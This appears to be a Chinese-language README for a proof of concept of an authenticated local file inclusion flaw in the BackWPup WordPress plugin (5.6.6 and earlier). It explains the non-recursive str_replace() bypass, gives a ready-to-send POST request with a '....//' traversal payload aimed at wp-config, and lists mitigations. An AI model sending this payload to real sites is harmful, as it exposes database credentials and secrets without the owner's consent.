BackWPup 5.6.6 及更早版本受到通过 /wp-json/backwpup/v1/getblock REST 端点的 block_name 参数引发的已认证本地文件包含(LFI)漏洞影响。
该缺陷由对遍历序列进行非递归 str_replace() 清理所致,已在 5.6.7 版本中修复。
本仓库严格用于教育和道德安全研究目的。此处提供的信息旨在帮助管理员和安全团队验证其系统。未经明确书面许可,请勿针对目标使用此信息。
BackWPupHelpers::component()POST /wp-json/backwpup/v1/getblockblock_name易受攻击的组件加载器在调用 include() 之前应用了非递归的 str_replace() 清理。这可以通过构造的遍历模式(如 ....// 或 ..././)绕过,从而允许攻击者控制路径解析。
wp-config.php)默认情况下,利用该漏洞需要管理员级别的访问权限。如果备份权限被委派,低权限用户也可能能够利用此问题。
/wp-json/backwpup/v1/getblock 的合法 POST 请求。block_name 替换为遍历载荷。示例请求:
POST /wp-json/backwpup/v1/getblock HTTP/1.1
Host: target.example.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-WP-Nonce: <your_nonce_here>
Cookie: wordpress_logged_in_<hash>=<your_session_cookie>
block_name=....//....//....//....//wp-config&block_type=component&block_data%5Btype%5D=success&block_data%5Bfont%5D=small&block_data%5Bdismiss_icon%5D=true&block_data%5Bcontent%5D=You+scheduled+a+new+backup+successfully!
backwpup 权限分配给受信任的角色/wp-json/backwpup/v1/getblock 的可疑访问